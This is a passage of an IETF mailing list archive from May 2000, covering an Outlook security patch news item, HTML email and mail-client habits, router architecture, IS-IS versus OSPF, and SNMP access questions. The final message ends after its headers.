by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id FAA24258;
Tue, 16 May 2000 05:47:42 -0700 (PDT)
Date: Tue, 16 May 2000 05:47:42 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Outlook finally patched!
X-Loop: [EMAIL PROTECTED]
> MS Makes E-mail Virus Patch
>
> By MICHAEL J MARTINEZ
> AP Business Writer
> 05/15/00
>
> SEATTLE (AP) -- Charged with enabling easy access for computer
> viruses like the Love Bug, Microsoft is altering its popular
> Outlook e-mail software to prevent users from running any
> "executable'' program attachments, good or bad.
>
> As an additional safeguard, any time a computer program
> attempts to access Outlook's address book or tries to send
> e-mail via Outlook, users will receive a warning and will be
> urged not to allow it.
>
> The software "patch'' announced Monday for Microsoft Outlook
> 98 and Office 2000 will be available on a Microsoft Web site
> starting next week.
>...
> "We've been taking a really hard look at the security issues with
> regard to Outlook over the past few weeks,'' said Steven Sinofsky,
> senior vice president for Microsoft Office, a package of software
> programs that includes Outlook.
>...
> Legitimate programs that access Outlook, such as the synchronization
> software for Palm organizers and other handheld devices, will also
> be flagged, though users can simply click "Yes'' and allow the
> transfer of information to take place.
Yeay!
Cheers,
James
>From owner-ietf-outbound Tue May 16 09:50:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA05331
for [EMAIL PROTECTED]; Tue, 16 May 2000 09:50:03 -0400 (EDT)
Received: from fep20-svc.tin.it (pop10-acc.tin.it [212.216.176.73])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA05256
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 09:40:02 -0400 (EDT)
Received: from andrea ([212.216.57.131]) by fep20-svc.tin.it
(InterMail vM.4.01.02.17 201-229-119) with SMTP
id <20000516133930.SUAR26786.fep20-svc.tin.it@andrea>
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 15:39:30 +0200
Received: by localhost with Microsoft MAPI; Tue, 16 May 2000 15:39:48 +0200
Message-ID: <[EMAIL PROTECTED]>
From: Andrea <[EMAIL PROTECTED]>
Reply-To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Video on IP
Date: Tue, 16 May 2000 15:39:47 +0200
Organization: Video System Engineering
X-Mailer: Posta elettronica Internet di Microsoft/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Dear IETF People,
I am working into the video broadcast market (terrestrial and Satellite tv
channels), and more and more people are demanding solution to deliver
streaming video on IP. For some application I am working on, I would like
to webcast video using or Windows Media MP4 format or RealVideo G2
(tipically from a webcam), but i need to decode the compressed signal at
the end point. I need to have again my analog video to be, maybe, recorded
on a vtr. I perfectly know the quality problems I will have, but this is
not an issue.
I am going to use Osprey boards to encode.
Has anyone of you any experience on this? An help would be very
appreciated. I have spoken with both Microsoft and Real tech support, but
none seemed to know something.
Best regards
Andrea Bovarini
Video System Engineering, Milan, Italy
>From owner-ietf-outbound Tue May 16 10:00:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA05485
for [EMAIL PROTECTED]; Tue, 16 May 2000 10:00:03 -0400 (EDT)
Received: from iti-idsc.gov.eg (mail.iti.gov.eg [163.121.12.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA05457
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 09:59:02 -0400 (EDT)
Received: from iti-idsc.gov.eg (seg28.iti.idsc.gov.eg [163.121.28.7] (may be forged))
by iti-idsc.gov.eg (8.9.1b+Sun/8.9.1) with ESMTP id QAA02196
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 16:59:48 +0300 (EET DST)
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 10 May 1999 17:57:47 +0300
From: zozo <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Mobile Ad hoc
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
What are the benefits from
"Integeration between Mobile IP and Ad hoc networks"?
>From owner-ietf-outbound Tue May 16 11:40:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA07481
for [EMAIL PROTECTED]; Tue, 16 May 2000 11:40:01 -0400 (EDT)
Received: from episteme-software.com (resnick1.qualcomm.com [63.250.90.98])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA07215
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 11:30:26 -0400 (EDT)
Received: from annex2-p28.qualcomm.com (129.46.86.80) by
episteme-software.com with ESMTP
(Eudora Internet Mail Server 3.0.1d10); Tue, 16 May 2000 10:29:44 -0500
Mime-Version: 1.0
X-Sender: [EMAIL PROTECTED] (Unverified)
Message-Id: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
X-Mailer: Eudora [Macintosh version 4.3.1b20-05.00]
Date: Tue, 16 May 2000 08:29:36 -0700
To: "Theodore Y. Ts'o" <[EMAIL PROTECTED]>
From: Pete Resnick <[EMAIL PROTECTED]>
Subject: Re: HTML email
Cc: John C Klensin <[EMAIL PROTECTED]>, John Stracke <[EMAIL PROTECTED]>,
[EMAIL PROTECTED]
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
X-Loop: [EMAIL PROTECTED]
On 5/15/00 at 9:12 PM -0400, Theodore Y. Ts'o wrote:
>It seems to be usually the case, for most messages that I've seen, that
>there's *no* added value to the HTML version. I.e., other than adding
><BR> at the end of lines, and using microsoft-specific font settings at
>the beginning of each paragraph (usually all the same), there's nothing
>to be gained by using HTML except for bloating the message.
>
>So one question to ask is "why send HTML at all" in those cases? It
>would be nice if MUA's could detect this case, and only send plain-text,
>and reserve HTML only for when it's actually adding something of value.
Some MUA's do just that.
pr
--
Pete Resnick <mailto:[EMAIL PROTECTED]>
Eudora Engineering - QUALCOMM Incorporated
>From owner-ietf-outbound Tue May 16 12:50:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA08822
for [EMAIL PROTECTED]; Tue, 16 May 2000 12:50:02 -0400 (EDT)
Received: from shell5.ba.best.com ([EMAIL PROTECTED] [206.184.139.136])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA08732
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 12:42:49 -0400 (EDT)
Received: (from gds@localhost)
by shell5.ba.best.com (8.9.3/8.9.2/best.sh) id JAA00734;
Tue, 16 May 2000 09:42:49 -0700 (PDT)
Date: Tue, 16 May 2000 09:42:49 -0700 (PDT)
From: Greg Skinner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: HTML email
To: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Loop: [EMAIL PROTECTED]
"Theodore Y. Ts'o" <[EMAIL PROTECTED]> wrote:
> I wonder how many people are still using plain-text, non-HTML enabled
> mail readers? It still happens on some mailing list, where someone will
> send a base-64 encoded html'ified message (usually using MS Outlook),
> and someone will send back "try again in English; I don't read that MIME
> crap."
I still use plaintext mail readers such as elm, pine, even /usr/ucb/Mail. :)
I prefer to save the attachment off and use a separate program to read it
later, rather than to launch it from the mail program.
from the old school,
--gregbo
>From owner-ietf-outbound Tue May 16 14:20:26 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA10466
for [EMAIL PROTECTED]; Tue, 16 May 2000 14:20:02 -0400 (EDT)
Received: from prue.eim.surrey.ac.uk (IDENT:[EMAIL PROTECTED] [131.227.76.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA10428
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 14:18:51 -0400 (EDT)
Received: from petra.ee.surrey.ac.uk ([131.227.88.13] ident=eep1lw)
by prue.eim.surrey.ac.uk with esmtp (Exim 3.03 #1)
id 12rlvU-0000lP-00; Tue, 16 May 2000 19:18:40 +0100
Date: Tue, 16 May 2000 19:18:38 +0100 (BST)
From: Lloyd Wood <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: Greg Skinner <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: HTML email
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Organization: speaking for none
X-url: http://www.ee.surrey.ac.uk/Personal/L.Wood/
X-no-archive: yes
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Tue, 16 May 2000, Greg Skinner wrote:
> > I wonder how many people are still using plain-text, non-HTML enabled
> > mail readers? It still happens on some mailing list, where someone will
> > send a base-64 encoded html'ified message (usually using MS Outlook),
> > and someone will send back "try again in English; I don't read that MIME
> > crap."
>
> I still use plaintext mail readers such as elm, pine, even /usr/ucb/Mail. :)
Strictly speaking, pine isn't a plaintext mail reader. You can view
HTML attachments very differently if you have headers visible or
not; pine (I'm using 4.21) defaults to rendering the HTML attachment
to text, rather than displaying the text attachment.
L.
doesn't understand mutt 1.0's handling of pgp attachments, and hasn't
got it to interoperate with pgppine. Hopefully 1.2 is better...
> I prefer to save the attachment off and use a separate program to read it
> later, rather than to launch it from the mail program.
>
> from the old school,
> --gregbo
<[EMAIL PROTECTED]>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>
>From owner-ietf-outbound Wed May 17 08:00:36 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA03251
for [EMAIL PROTECTED]; Wed, 17 May 2000 08:00:02 -0400 (EDT)
Received: from ms.info.sh.cn. ([203.95.7.153])
by ietf.org (8.9.1a/8.9.1a) with SMTP id HAA03177
for <[EMAIL PROTECTED]>; Wed, 17 May 2000 07:55:12 -0400 (EDT)
Received: from [172.16.2.56] by ms.info.sh.cn. (5.65v4.0/1.1.19.2/10Sep99-0909AM)
id AA12961; Wed, 17 May 2000 19:44:56 +0800
Message-Id: <[EMAIL PROTECTED]>
Date: Wed, 17 May 2000 19:54:09 +0800
From: Wang Qihua <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
X-Mailer: Mozilla 4.51 [zh-cn] (Win98; I)
X-Accept-Language: zh-CN
Mime-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Gigabit router architecture
Content-Type: text/plain; charset=gb2312
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
I need to get some info on the architecture of gigabit routers. Can you
suggest anything?
>From owner-ietf-outbound Wed May 17 09:10:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA04579
for [EMAIL PROTECTED]; Wed, 17 May 2000 09:10:01 -0400 (EDT)
Received: from prue.eim.surrey.ac.uk (IDENT:[EMAIL PROTECTED] [131.227.76.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA04545
for <[EMAIL PROTECTED]>; Wed, 17 May 2000 09:06:11 -0400 (EDT)
Received: from petra.ee.surrey.ac.uk ([131.227.88.13] ident=eep1lw)
by prue.eim.surrey.ac.uk with esmtp (Exim 3.03 #1)
id 12s3WP-0001wT-00; Wed, 17 May 2000 14:05:57 +0100
Date: Wed, 17 May 2000 14:05:54 +0100 (BST)
From: Lloyd Wood <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: Gigabit router architecture
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Organization: speaking for none
X-url: http://www.ee.surrey.ac.uk/Personal/L.Wood/
X-no-archive: yes
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Wed, 17 May 2000, Wang Qihua wrote:
> I need to get some info on the architecture of gigabit routers. Can you
> suggest anything?
Partridge, Carvey, Burgess et al, 'A Fifty Gigabit Per Second IP
Router', BBN Technologies, IEEE/ACM Transactions on Networking,
6(3):237-248, June 1998.
http://www.cs.cmu.edu/~hzhang/15-744/Review/Review2/ksk.partridge98.html
http://www.ccrc.wustl.edu/~ton/jun98.html#Partridge
<[EMAIL PROTECTED]>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>
>From owner-ietf-outbound Wed May 17 13:50:38 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA09273
for [EMAIL PROTECTED]; Wed, 17 May 2000 13:50:02 -0400 (EDT)
Received: from mailhost.metro-optix.com (mail.metro-optix.com [63.91.47.254])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA09248
for <[EMAIL PROTECTED]>; Wed, 17 May 2000 13:48:51 -0400 (EDT)
Received: by MAILHOST with Internet Mail Service (5.5.2650.21)
id <LCAZVFJT>; Wed, 17 May 2000 12:49:22 -0500
Message-ID: <D7F6115661E9D311834F006008F5C83C09639B@MAILHOST>
From: David Wang <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: FW: MPLS and IS-IS
Date: Wed, 17 May 2000 12:49:21 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Hi all,
IS-IS is defined to work with CLNP not for IP originally. Until today a lot
of SONET and telecommunication equipment vendors still use IS-IS to route
CLNP packets through the SONET Data communication channel(DCC) to carry
management information and there is a great pressure to change this to OSPF
and IP. I also know that UUNET runs IS-IS on their network. I never heard
any other networks run IS-IS. Seems I am wrong. My questions are.
1. You guys are talking about using IS-IS in a IP networks not in CLNP
networks. The IS-IS has been modified according to RFC 1195 (Use of OSI
IS-IS for Routing in TCP/IP and Dual Environments) or some other standard.
Is this correct?
2. Besides UUNET, which ISPs run IS-IS protocol? Can you name a few? or
what percentage of networks run IS-IS instead of OSPF?
Thanks
David
-----Original Message-----
From: HANSEN CHAN [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 16, 2000 7:22 AM
To: [EMAIL PROTECTED]
Subject: MPLS and IS-IS
Hi all,
I have been hearing IS-IS is a better protocol to be used than OSPF in a
MPLS
network for TE application. Is that a fair statement? What are the technical
reasons?
Appreciate if someone can shed some light on this subject.
Thanks,
Hansen
>From owner-ietf-outbound Thu May 18 04:20:43 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA29309
for [EMAIL PROTECTED]; Thu, 18 May 2000 04:20:03 -0400 (EDT)
Received: from hawaii.globewebs.com (hawaii.globewebs.com [199.202.42.148])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA29267
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 04:10:16 -0400 (EDT)
Received: from uklozms02.Teleglobe.CA (uklozms02.Teleglobe.CA [172.25.81.11])
by hawaii.globewebs.com (8.8.8/8.8.8) with ESMTP id EAA18879
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 04:18:39 -0400 (EDT)
Received: by uklozms02.Teleglobe.CA with Internet Mail Service (5.5.2448.0)
id <KK70AM8T>; Thu, 18 May 2000 08:58:25 +0100
Message-ID: <[EMAIL PROTECTED]>
From: "Hallgren, Michael" <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: MPLS and IS-IS
Date: Thu, 18 May 2000 08:58:25 +0100
Return-Receipt-To: "Hallgren, Michael" <[EMAIL PROTECTED]>
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
>Hi all,
>
>IS-IS is defined to work with CLNP not for IP originally. Until today a lot
>of SONET and telecommunication equipment vendors still use IS-IS to route
>CLNP packets through the SONET Data communication channel(DCC) to carry
>management information and there is a great pressure to change this to OSPF
>and IP. I also know that UUNET runs IS-IS on their network. I never heard
>any other networks run IS-IS. Seems I am wrong. My questions are.
>
>1. You guys are talking about using IS-IS in a IP networks not in CLNP
>networks. The IS-IS has been modified according to RFC 1195 (Use of OSI
>IS-IS for Routing in TCP/IP and Dual Environments) or some other standard.
>Is this correct?
>
>2. Besides UUNET, which ISPs run IS-IS protocol? Can you name a few? or
>what percentage of networks run IS-IS instead of OSPF?
Teleglobe
>
>Thanks
>David
>
mh
>From owner-ietf-outbound Thu May 18 05:20:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA01294
for [EMAIL PROTECTED]; Thu, 18 May 2000 05:20:02 -0400 (EDT)
Received: from wiproecmx2.wipro.com ([164.164.31.6])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA01255
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 05:15:41 -0400 (EDT)
Received: from ecvwall1.wipro.com (ecvwall1.wipro.com [192.168.181.23])
by wiproecmx2.wipro.com (8.9.3/8.9.3) with SMTP id OAA28051
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 14:53:38 GMT
Received: from webmail ([192.168.172.18]) by ecmail.wipsys.soft.net
(Netscape Messaging Server 3.6) with SMTP id AAA225F;
Thu, 18 May 2000 14:39:17 +0530
From: "Shivendra Kumar" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: SNMP object ACCESS
X-Mailer: Netscape Messenger Express 3.5.2 [Mozilla/4.7 [en] (WinNT; I)]
Date: Thu, 18 May 2000 14:39:17 +0530
Message-ID: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Hi All,
In SNMP, is it possible to change the access to an object in the standard
MIB to a lower access permission?For example, tcpConnState is an object in
the tcpConnTable which is under the interface group and has an access of
read-write.Can this access be changed to read-only in one's agent
implementation?If not, why? In that case what is the difference between the
access clauses ACCESS & MAX-ACCESS defined in SMIv1 and SMIv2 respectively?
Thanks & regards,
Wipro team.
>From owner-ietf-outbound Thu May 18 09:21:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA04810
for [EMAIL PROTECTED]; Thu, 18 May 2000 09:20:02 -0400 (EDT)
Received: from inbound.satyam.net.in ([202.144.76.6])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA04781
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 09:19:07 -0400 (EDT)
Received: from N1A8Z0 (210.214.40.29) by inbound.satyam.net.in (NPlex 4.5.051)
id 39238E080000CE71 for [EMAIL PROTECTED]; Thu, 18 May 2000 12:15:20 +0000
Received: by N1A8Z0 with Microsoft Mail
id <01BFC0F0.BD1642E0@N1A8Z0>; Thu, 18 May 2000 17:44:38 +0530
Message-ID: <01BFC0F0.BD1642E0@N1A8Z0>
From: DEEPAK THAKKAR <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: new order
Date: Thu, 18 May 2000 17:44:35 +0530
Return-Receipt-To: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Sirs,
We require following items kindly send us your best offer.
HP-26A,HP-29A,HP-45A,HP-41A,HP-49A,HP-23D,HP-06A,HP-03A,HP-98A,HP-74A,
HP-27A,HP-92A,HP-00A.
EACH ITEM QTY:- 50 PCS.
For,VIDUR EXPORTS[INDIA]
D.J.Thakkar
>From owner-ietf-outbound Thu May 18 18:20:44 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA13752
for [EMAIL PROTECTED]; Thu, 18 May 2000 18:20:02 -0400 (EDT)
Received: from wjao002.sita.int (wjao002.sita.int [57.250.224.19])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA13712
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 18:13:12 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: by wjao002.sita.int (Smap/SITAnet-firewall-2.1) id WAA07532
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 22:12:59 GMT
Received: from mx.sita.int(57.6.21.105) by wjao002 via smap (3.2)
id xma007528; Thu, 18 May 00 22:12:56 GMT
Received: from sydney1.syd.sita.int (sydney1.syd.sita.int [57.4.198.10])
by mx1.sita.int (8.8.8/SITAnet-relay-2.6) with SMTP id WAA03386
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 22:12:41 GMT
Received: by sydney1.syd.sita.int(Lotus SMTP MTA v4.6.5 (863.2 5-20-1999)) id
4A2568E3.007A0171 ; Fri, 19 May 2000 08:12:37 +1000
X-Lotus-FromDomain: SITA
To: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 19 May 2000 08:12:33 +1000
Subject: Research
Mime-Version: 1.0
Content-type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Loop: [EMAIL PROTECTED]
Anyone advise the possibility that you don't need to go to university or
institution but can do internet research
remotely..
Cheers
Sam
Sita Equant Operation
Fault Management Unit
Phone : 61-02-92401408
CVN : 72391408
>From owner-ietf-outbound Thu May 18 18:50:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA13985
for [EMAIL PROTECTED]; Thu, 18 May 2000 18:50:04 -0400 (EDT)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.224.210])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA13919
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 18:44:59 -0400 (EDT)
Received: from localhost (ole@localhost) by diablo.cisco.com (8.8.6
(PHNE_14041)/CISCO.SERVER.1.2) with SMTP id PAA07859; Thu, 18 May 2000 15:44:25 -0700
(PDT)
Date: Thu, 18 May 2000 15:44:25 -0700 (PDT)
From: "Ole J. Jacobsen" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: Research
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
Why bother to do the research remotely when you can simply buy a bogus
degree from a bogus university online? That will save both time and money.
The Internet is a truly wonderful place :-)
Ole
Ole J. Jacobsen
Editor and Publisher
The Internet Protocol Journal
Cisco Systems, Office of the CSO
Tel: +1 408-527-8972
e-mail: [EMAIL PROTECTED]
URL: http://www.cisco.com/ipj
* See you at INET 2000, Yokohama, Japan July 18-21
http://www.isoc.org/inet2000
On Fri, 19 May 2000 [EMAIL PROTECTED] wrote:
>
>
>
> Anyone advise the possibility that you don't need to go to university or
> institution but can do internet research
> remotely..
>
> Cheers
> Sam
>
> Sita Equant Operation
> Fault Management Unit
> Phone : 61-02-92401408
> CVN : 72391408
>
>
>
>From owner-ietf-outbound Fri May 19 00:00:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id AAA18559
for [EMAIL PROTECTED]; Fri, 19 May 2000 00:00:04 -0400 (EDT)
Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA18467
for <[EMAIL PROTECTED]>; Thu, 18 May 2000 23:52:28 -0400 (EDT)
Received: (from mail@localhost)
by guardian.apnic.net (8.9.3/8.9.3) id NAA16882
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 13:51:49 +1000 (EST)
Received: from julubu.staff.apnic.net(192.168.1.37) by int-gw.staff.apnic.net via smap
(V2.1)
id xma016880; Fri, 19 May 00 13:51:34 +1000
Date: Fri, 19 May 2000 13:51:35 +1000 (EST)
From: Bruce Campbell <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: HTML email
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Mon, 15 May 2000, Theodore Y. Ts'o wrote:
tytso> I wonder how many people are still using plain-text,
tytso> non-HTML enabled mail readers? It still happens on some
tytso> mailing list, where someone will send a base-64 encoded
tytso> html'ified message (usually using MS Outlook), and someone
tytso> will send back "try again in English; I don't read that MIME
tytso> crap."
Just a quick survey on the last 513 messages seen in the IETF list, based
on X-Mailer header:
1 Allaire
1 CrossPoint
1 dtmail
1 Eudora
1 KMail
1 Lotus
1 Netscape (Messenger Express)
1 Posta (Posta elettronica Internet di Microsoft/MAPI - 8.0.0.4211)
2 Mew
2 Mulberry/2.0.0
5 Mutt
5 VM
5 Windows (Eudora Pro)
25 ELM
29 exmh
28 Pine (based on Message-ID strings)
34 QUALCOMM (later versions of Eudora)
37 Internet (Internet Mail Service, another Microsoftism)
52 Microsoft (Outlook)
54 Mozilla
Most of these do natively understand HTML email to a certain extent, or
can be configured to pass HTML email to an outside viewer, and a small
number send HTML email by default (based on personal experience). I don't
know of any in the above list that cannot be convinced to send plain text.
Please remember that the capabilities of a given client are different from
the (possibly bad in some cases) defaults set by the distributers/authors
of a given client. Perhaps the focus should be on the defaults, rather
than blindly saying ``Mailer X is bad.''
--==--
Bruce.
Sysadmin, APNIC
>From owner-ietf-outbound Fri May 19 01:00:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id BAA19006
for [EMAIL PROTECTED]; Fri, 19 May 2000 01:00:02 -0400 (EDT)
Received: from marcos.networkcs.com (marcos.networkcs.com [137.66.16.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id AAA18975
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 00:54:06 -0400 (EDT)
Received: from us.networkcs.com (us.networkcs.com [137.66.11.15])
by marcos.networkcs.com (8.9.3/8.9.3) with ESMTP id XAA22027;
Thu, 18 May 2000 23:54:01 -0500 (CDT)
(envelope-from [EMAIL PROTECTED])
Received: (from salo@localhost)
by us.networkcs.com (8.9.2/8.9.2) id XAA59053;
Thu, 18 May 2000 23:54:01 -0500 (CDT)
(envelope-from salo)
Date: Thu, 18 May 2000 23:54:01 -0500 (CDT)
From: Tim Salo <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: HTML email
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> Date: Fri, 19 May 2000 13:51:35 +1000 (EST)
> From: Bruce Campbell <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: HTML email
> [...]
> tytso> I wonder how many people are still using plain-text,
> tytso> non-HTML enabled mail readers? ...
>
> Just a quick survey on the last 513 messages seen in the IETF list, based
> on X-Mailer header:
> [...]
>
> Most of these do natively understand HTML email to a certain extent, or
> can be configured to pass HTML email to an outside viewer, and a small
> number send HTML email by default (based on personal experience). I don't
If I count correctly, your list contains 284 samples. I suspect that
a good number of the remaining 229 mail messages were created by older
mailers that don't generate an X-Mailer header.
I assume this message doesn't contain an "X-Mailer: Berkeley Mail forever"
header.
(Ok, ok. I have been known to use vi as my HTML editor, too...)
-tjs
And, from NANOG (I deleted most of the headers, but I didn't see an
X-Mailer:):
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> Subject: Please Format Your Posts
> Date: Sat, 13 May 2000 22:13:09 -0700
>
> I know that I am old & curmudgeonly now, but surely I cannot
> be the only NANOG person who uses UCB Mail on occasion?
>
> Or is it a lost cause to expect people to be concerned about
> the number of characters on a line, when they are arguing
> that we shouldn't worry about the number of globally-known
> routing prefixes?
>
> Sean. (who could buy a fancy email system,
> but doesn't want one at home
> and who could buy a big-iron router,
> but doesn't want one at home)
>From owner-ietf-outbound Fri May 19 10:20:40 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA05473
for [EMAIL PROTECTED]; Fri, 19 May 2000 10:20:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA05386
for <[EMAIL PROTECTED]>; Fri, 19 May 2000 10:12:19 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4JECEn28690;
Fri, 19 May 2000 10:12:15 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Bruce Campbell <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: HTML email
In-reply-to: Your message of "Fri, 19 May 2000 13:51:35 +1000."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 19 May 2000 10:12:14 -0400
X-Loop: [EMAIL PROTECTED]
